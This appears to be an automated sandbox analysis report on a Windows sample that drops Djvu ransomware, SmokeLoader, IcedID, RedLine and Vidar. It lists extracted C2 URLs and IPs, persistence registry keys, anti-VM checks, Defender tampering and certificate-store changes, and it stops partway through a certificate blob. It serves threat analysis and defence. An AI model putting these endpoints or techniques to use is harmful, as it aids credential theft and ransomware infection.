djvu | 6df0a3efc6e374c2cce9f376c79a388a87089180c774c94d84bb89f3f608392d

Analysis

max time kernel
150s
max time network
161s
platform
windows10_x64
resource
win10-en-20210920
submitted
22-10-2021 14:27

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

6df0a3efc6e374c2cce9f376c79a388a87089180c774c94d84bb89f3f608392d.exe
Size

345KB
MD5

6996655f5baa7ee2c92b06909c9f418b
SHA1

ead0bf3366590c3b3375f7dc4f776753f4e1b823
SHA256

6df0a3efc6e374c2cce9f376c79a388a87089180c774c94d84bb89f3f608392d
SHA512

219c26ef784aee4b5df6563946ca90a5f332970f9bb8133774bb05bf0128280c91df377eeafff3f3c327bcfd3b3e84d18be16641f97f1c5db89aafac6600a838

Malware Config

Extracted

Family

smokeloader

Version

2020

http://gejajoo7.top/

http://sysaheu9.top/

http://nusurtal4f.net/

http://netomishnetojuk.net/

http://escalivrouter.net/

http://nick22doom4.net/

http://wrioshtivsio.su/

http://nusotiso4.su/

http://rickkhtovkka.biz/

http://palisotoliso.net/

rc4.i32

Extracted

Family

icedid

Campaign

1875681804

enticationmetho.ink

Extracted

Family

redline

Botnet

MRFSW

65.21.194.86:2451

Extracted

Family

vidar

Version

41.5

Botnet

706

https://mas.to/@xeroxxx

Attributes

profile_id
706

Extracted

Family

vidar

Version

41.5

Botnet

517

https://mas.to/@xeroxxx

Attributes

profile_id
517

Extracted

Family

djvu

http://rlrz.org/lancer

Signatures

Detected Djvu ransomware 5 IoCs

Processes:

resource	yara_rule
behavioral1/memory/1760-834-0x0000000000424141-mapping.dmp	family_djvu
behavioral1/memory/2060-838-0x0000000000EC0000-0x0000000000FDB000-memory.dmp	family_djvu
behavioral1/memory/1760-839-0x0000000000400000-0x0000000000537000-memory.dmp	family_djvu
behavioral1/memory/968-852-0x0000000000424141-mapping.dmp	family_djvu
behavioral1/memory/968-873-0x0000000000400000-0x0000000000537000-memory.dmp	family_djvu

Djvu Ransomware
Ransomware which is a variant of the STOP family.
ransomware djvu
IcedID, BokBot
IcedID is a banking trojan capable of stealing credentials.
trojan banker icedid
Modifies Windows Defender Real-time Protection settings 3 TTPs
evasion trojan

Modify Registry
T1112

Modify Existing Service
T1031

Disabling Security Tools
T1089
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
infostealer redline

RedLine Payload 4 IoCs

Processes:

resource	yara_rule
behavioral1/memory/3532-203-0x00000000007B0000-0x00000000007CE000-memory.dmp	family_redline
behavioral1/memory/2416-210-0x0000000000400000-0x0000000000420000-memory.dmp	family_redline
behavioral1/memory/2416-215-0x0000000000418D1E-mapping.dmp	family_redline
behavioral1/memory/3532-214-0x00000000007C8532-mapping.dmp	family_redline

SmokeLoader
Modular backdoor trojan in use since 2014.
trojan backdoor smokeloader
Suspicious use of NtCreateProcessExOtherParentProcess 1 IoCs

Processes:

WerFault.exe

description pid process target process

PID 3780 created 3904 3780 WerFault.exe 446C.exe
Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs

Processes:

powershell.exe

description pid process target process

PID 1284 created 628 1284 powershell.exe lsass.exe
Vidar
Vidar is an infostealer based on Arkei stealer.
stealer vidar
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
evasion

Query Registry
T1012

Virtualization/Sandbox Evasion
T1497

description	pid	process	target process
PID 3780 created 3904	3780	WerFault.exe	446C.exe

description	pid	process	target process
PID 1284 created 628	1284	powershell.exe	lsass.exe

Vidar Stealer 5 IoCs

stealer

Processes:

resource	yara_rule
behavioral1/memory/2036-870-0x0000000000400000-0x00000000008E3000-memory.dmp	family_vidar
behavioral1/memory/2036-869-0x0000000000A70000-0x0000000000B46000-memory.dmp	family_vidar
behavioral1/memory/4060-929-0x00000000004A18CD-mapping.dmp	family_vidar
behavioral1/memory/396-934-0x0000000004C10000-0x0000000004CE6000-memory.dmp	family_vidar
behavioral1/memory/4060-935-0x0000000000400000-0x00000000004D9000-memory.dmp	family_vidar

Downloads MZ/PE file

Executes dropped EXE 28 IoCs

Processes:

2BFE.exe2BFE.exe3749.exe399C.exe3C4C.exe446C.exe4806.exe4DB5.exe5288.exesys.exe4806.exe6666.exeC2E7.exeC2E7.exeC8F2.exeC2E7.exeC2E7.exeCB36.exeCEA2.exeCF4E.exewND_P0R7CSA.EXebuild2.exebuild3.exebuild3.exebuild2.exemstsca.exemstsca.exeservices64.exe

pid	process
3648	2BFE.exe
3180	2BFE.exe
2872	3749.exe
1552	399C.exe
2884	3C4C.exe
3904	446C.exe
3428	4806.exe
2020	4DB5.exe
2176	5288.exe
820	sys.exe
2416	4806.exe
2700	6666.exe
2060	C2E7.exe
1760	C2E7.exe
3856	C8F2.exe
2188	C2E7.exe
968	C2E7.exe
2036	CB36.exe
596	CEA2.exe
1256	CF4E.exe
3724	wND_P0R7CSA.EXe
396	build2.exe
2056	build3.exe
3504	build3.exe
4060	build2.exe
1368	mstsca.exe
1348	mstsca.exe
2864	services64.exe

Checks BIOS information in registry 2 TTPs 4 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

3749.exe4DB5.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	3749.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	4DB5.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	4DB5.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	3749.exe

Deletes itself 1 IoCs

Processes:

pid process

3008
Loads dropped DLL 6 IoCs

Processes:

399C.exeCB36.exemsiexec.exebuild2.exe

pid process

1552 399C.exe
2036 CB36.exe
2036 CB36.exe
4040 msiexec.exe
4060 build2.exe
4060 build2.exe
Modifies file permissions 1 TTPs 1 IoCs
discovery

File Permissions Modification
T1222

Processes:

icacls.exe

pid process

3908 icacls.exe
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081

pid	process
3008

pid	process
1552	399C.exe
2036	CB36.exe
2036	CB36.exe
4040	msiexec.exe
4060	build2.exe
4060	build2.exe

pid	process
3908	icacls.exe

Themida packer 4 IoCs

Detects Themida, an advanced Windows software protection system.

themida

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\3749.exe	themida
behavioral1/memory/2872-142-0x0000000001100000-0x0000000001101000-memory.dmp	themida
C:\Users\Admin\AppData\Local\Temp\4DB5.exe	themida
behavioral1/memory/2020-176-0x0000000000D10000-0x0000000000D11000-memory.dmp	themida

Accesses 2FA software files, possible credential harvesting 2 TTPs
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials in Files
T1081

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

Processes:

C2E7.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Software\Microsoft\Windows\CurrentVersion\Run\SysHelper = "\"C:\\Users\\Admin\\AppData\\Local\\7c0d7ad7-3ebd-4b44-8d84-a1dfb91cbcd5\\C2E7.exe\" --AutoStart"	C2E7.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Checks whether UAC is enabled 1 TTPs 2 IoCs

evasion trojan

System Information Discovery

T1082

Processes:

3749.exe4DB5.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	3749.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	4DB5.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102
Looks up external IP address via web service 3 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow ioc

93 api.2ip.ua
94 api.2ip.ua
100 api.2ip.ua
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs

Processes:

3749.exe4DB5.exe

pid process

2872 3749.exe
2020 4DB5.exe

flow	ioc
93	api.2ip.ua
94	api.2ip.ua
100	api.2ip.ua

pid	process
2872	3749.exe
2020	4DB5.exe

Suspicious use of SetThreadContext 9 IoCs

Processes:

6df0a3efc6e374c2cce9f376c79a388a87089180c774c94d84bb89f3f608392d.exe2BFE.exe4806.exe446C.exeC2E7.exeC2E7.exebuild3.exebuild2.exemstsca.exe

description	pid	process	target process
PID 968 set thread context of 1836	968	6df0a3efc6e374c2cce9f376c79a388a87089180c774c94d84bb89f3f608392d.exe	6df0a3efc6e374c2cce9f376c79a388a87089180c774c94d84bb89f3f608392d.exe
PID 3648 set thread context of 3180	3648	2BFE.exe	2BFE.exe
PID 3428 set thread context of 2416	3428	4806.exe	4806.exe
PID 3904 set thread context of 3532	3904	446C.exe	AppLaunch.exe
PID 2060 set thread context of 1760	2060	C2E7.exe	C2E7.exe
PID 2188 set thread context of 968	2188	C2E7.exe	C2E7.exe
PID 2056 set thread context of 3504	2056	build3.exe	build3.exe
PID 396 set thread context of 4060	396	build2.exe	build2.exe
PID 1368 set thread context of 1348	1368	mstsca.exe	mstsca.exe

Launches sc.exe
Sc.exe is a Windows utlilty to control services on the system.
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082
Program crash 1 IoCs

Processes:

WerFault.exe

pid pid_target process target process

3780 3904 WerFault.exe 446C.exe

pid	pid_target	process	target process
3780	3904	WerFault.exe	446C.exe

Checks SCSI registry key(s) 3 TTPs 9 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

Processes:

6df0a3efc6e374c2cce9f376c79a388a87089180c774c94d84bb89f3f608392d.exe399C.exe2BFE.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	6df0a3efc6e374c2cce9f376c79a388a87089180c774c94d84bb89f3f608392d.exe
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	6df0a3efc6e374c2cce9f376c79a388a87089180c774c94d84bb89f3f608392d.exe
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	399C.exe
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	399C.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	399C.exe
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	6df0a3efc6e374c2cce9f376c79a388a87089180c774c94d84bb89f3f608392d.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	2BFE.exe
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	2BFE.exe
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	2BFE.exe

Checks processor information in registry 2 TTPs 4 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

CB36.exebuild2.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	CB36.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	CB36.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	build2.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	build2.exe

Creates scheduled task(s) 1 TTPs 3 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task
T1053

Processes:

schtasks.exeschtasks.exeschtasks.exe

pid process

1068 schtasks.exe
1360 schtasks.exe
1516 schtasks.exe
Delays execution with timeout.exe 2 IoCs
evasion

Processes:

timeout.exetimeout.exe

pid process

1744 timeout.exe
3116 timeout.exe
Kills process with taskkill 3 IoCs
evasion

Processes:

taskkill.exetaskkill.exetaskkill.exe

pid process

2028 taskkill.exe
2876 taskkill.exe
1848 taskkill.exe

pid	process
1068	schtasks.exe
1360	schtasks.exe
1516	schtasks.exe

pid	process
1744	timeout.exe
3116	timeout.exe

pid	process
2028	taskkill.exe
2876	taskkill.exe
1848	taskkill.exe

Modifies data under HKEY_USERS 47 IoCs

Processes:

powershell.exe

description	ioc	process
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs	powershell.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1"	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root	powershell.exe

Modifies system certificate store 2 TTPs 5 IoCs

evasion spyware trojan

Install Root Certificate

T1130

Modify Registry

T1112

Processes:

build2.exeC2E7.exe

description	ioc	process
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8\Blob = 5c0000000100000004000000001000001900000001000000100000002fe1f70bb05d7c92335bc5e05b984da6030000000100000014000000cabd2a79a1076a31f21d253635cb039d4329a5e81d000000010000001000000073b6876195f5d18e048510422aef04e314000000010000001400000079b459e67bb6e5e40173800888c81a58f6e99b6e090000000100000016000000301406082b0601050507030206082b060105050703010b000000010000001a0000004900530052004700200052006f006f007400200058003100000062000000010000002000000096bcec06264976f37460779acf28c5a7cfe8a3c0aae11a8ffcee05c0bddf08c60f00000001000000200000003f0411ede9c4477057d57e57883b1f205b20cdc0f3263129b1ee0269a2678f630400000001000000100000000cd2f9e0da1773e9ed864da5e370e74e20000000010000006f0500003082056b30820353a0030201020211008210cfb0d240e3594463e0bb63828b00300d06092a864886f70d01010b0500304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f74205831301e170d3135303630343131303433385a170d3335303630343131303433385a304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f7420583130820222300d06092a864886f70d01010105000382020f003082020a0282020100ade82473f41437f39b9e2b57281c87bedcb7df38908c6e3ce657a078f775c2a2fef56a6ef6004f28dbde68866c4493b6b163fd14126bbf1fd2ea319b217ed1333cba48f5dd79dfb3b8ff12f1219a4bc18a8671694a66666c8f7e3c70bfad292206f3e4c0e680aee24b8fb7997e94039fd347977c99482353e838ae4f0a6f832ed149578c8074b6da2fd0388d7b0370211b75f2303cfa8faeddda63abeb164fc28e114b7ecf0be8ffb5772ef4b27b4ae04c12250c708d0329a0e15324ec13d9ee19bf10b34a8c3f89a36151deac870794f46371ec2ee26f5b9881e1895c34796c76ef3b906279e6dba49a2f26c5d010e10eded9108e16fbb7f7a8f7c7e50207988f360895e7e237960d36759efb0e72b11d9bbc03f94905d881dd05b42ad641e9ac0176950a0fd8dfd5bd121f352f28176cd298c1a80964776e4737baceac595e689d7f72d689c50641293e593edd26f524c911a75aa34c401f46a199b5a73a516e863b9e7d72a712057859ed3e5178150b038f8dd02f05b23e7b4a1c4b730512fcc6eae050137c439374b3ca74e78e1f0108d030d45b7136b407bac130305c48b7823b98a67d608aa2a32982ccbabd83041ba2830341a1d605f11bc2b6f0a87c863b46a8482a88dc769a76bf1f6aa53d198feb38f364dec82b0d0a28fff7dbe21542d422d0275de179fe18e77088ad4ee6d98b3ac6dd27516effbc64f533434f0203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e0416041479b459e67bb6e5e40173800888c81a58f6e99b6e300d06092a864886f70d01010b05000382020100551f58a9bcb2a850d00cb1d81a6920272908ac61755c8a6ef882e5692fd5f6564bb9b8731059d321977ee74c71fbb2d260ad39a80bea17215685f1500e59ebcee059e9bac915ef869d8f8480f6e4e99190dc179b621b45f06695d27c6fc2ea3bef1fcfcbd6ae27f1a9b0c8aefd7d7e9afa2204ebffd97fea912b22b1170e8ff28a345b58d8fc01c954b9b826cc8a8833894c2d843c82dfee965705ba2cbbf7c4b7c74e3b82be31c822737392d1c280a43939103323824c3c9f86b255981dbe29868c229b9ee26b3b573a82704ddc09c789cb0a074d6ce85d8ec9efceabc7bbb52b4e45d64ad026cce572ca086aa595e315a1f7a4edc92c5fa5fbffac28022ebed77bbbe3717b9016d3075e46537c3707428cd3c4969cd599b52ae0951a8048ae4c3907cecc47a452952bbab8fbadd233537de51d4d6dd5a1b1c7426fe64027355ca328b7078de78d3390e7239ffb509c796c46d5b415b3966e7e9b0c963ab8522d3fd65be1fb08c284fe24a8a389daac6ae1182ab1a843615bd31fdc3b8d76f22de88d75df17336c3d53fb7bcb415fffdca2d06138e196b8ac5d8b37d775d533c09911ae9d41c1727584be0241425f67244894d19b27be073fb9b84f817451e17ab7ed9d23e2bee0d52804133c31039edd7a6c8fc60718c67fde478e3f289e0406cfa5543477bdec899be91743df5bdb5ffe8e1e57a2cd409d7e6222dade1827	build2.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349	C2E7.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 5c000000010000000400000000080000090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e	C2E7.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8	build2.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8\Blob = 0400000001000000100000000cd2f9e0da1773e9ed864da5e370e74e0f00000001000000200000003f0411ede9c4477057d57e57883b1f205b20cdc0f3263129b1ee0269a2678f6362000000010000002000000096bcec06264976f37460779acf28c5a7cfe8a3c0aae11a8ffcee05c0bddf08c60b000000010000001a0000004900530052004700200052006f006f0074002000580031000000090000000100000016000000301406082b0601050507030206082b0601050507030114000000010000001400000079b459e67bb6e5e40173800888c81a58f6e99b6e1d000000010000001000000073b6876195f5d18e048510422aef04e3030000000100000014000000cabd2a79a1076a31f21d253635cb039d4329a5e81900000001000000100000002fe1f70bb05d7c92335bc5e05b984da620000000010000006f0500003082056b30820353a0030201020211008210cfb0d240e3594463e0bb63828b00300d06092a864886f70d01010b0500304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f74205831301e170d3135303630343131303433385a170d3335303630343131303433385a304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f7420583130820222300d06092a864886f70d01010105000382020f003082020a0282020100ade82473f41437f39b9e2b57281c87bedcb7df38908c6e3ce657a078f775c2a2fef56a6ef6004f28dbde68866c4493b6b163fd14126bbf1fd2ea319b217ed1333cba48f5dd79dfb3b8ff12f1219a4bc18a8671694a66666c8f7e3c70bfad292206f3e4c0e680aee24b8fb7997e94039fd347977c99482353e838ae4f0a6f832ed149578c8074b6da2fd0388d7b0370211b75f2303cfa8faeddda63abeb164fc28e114b7ecf0be8ffb5772ef4b27b4ae04c12250c708d0329a0e15324ec13d9ee19bf10b34a8c3f89a36151deac870794f46371ec2ee26f5b9881e1895c34796c76ef3b906279e6dba49a2f26c5d010e10eded9108e16fbb7f7a8f7c7e50207988f360895e7e237960d36759efb0e72b11d9bbc03f94905d881dd05b42ad641e9ac0176950a0fd8dfd5bd121f352f28176cd298c1a80964776e4737baceac595e689d7f72d689c50641293e593edd26f524c911a75aa34c401f46a199b5a73a516e863b9e7d72a712057859ed3e5178150b038f8dd02f05b23e7b4a1c4b730512fcc6eae050137c439374b3ca74e78e1f0108d030d45b7136b407bac130305c48b7823b98a67d608aa2a32982ccbabd83041ba2830341a1d605f11bc2b6f0a87c863b46a8482a88dc769a76bf1f6aa53d198feb38f364dec82b0d0a28fff7dbe21542d422d0275de179fe18e77088ad4ee6d98b3ac6dd27516effbc64f533434f0203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e0416041479b459e67bb6e5e40173800888c81a58f6e99b6e300d06092a864886f70d01010b05000382020100551f58a9bcb2a850d00cb1d81a6920272908ac61755c8a6ef882e5692fd5f6564bb9b8731059d321977ee74c71fbb2d260ad39a80bea17215685f1500e59ebcee059e9bac915ef869d8f8480f6e4e99190dc179b621b45f06695d27c6fc2ea3bef1fcfcbd6ae27f1a9b0c8aefd7d7e9afa2204ebffd97fea912b22b1170e8ff28a345b58d8fc01c954b9b826cc8a8833894c2d843c82dfee965705ba2cbbf7c4b7c74e3b82be31c822737392d1c280a43939103323824c3c9f86b255981dbe29868c229b9ee26b3b573a82704ddc09c789cb0a074d6ce85d8ec9efceabc7bbb52b4e45d64ad026cce572ca086aa595e315a1f7a4edc92c5fa5fbffac28022ebed77bbbe3717b9016d3075e46537c3707428cd3c4969cd599b52ae0951a8048ae4c3907cecc47a452952bb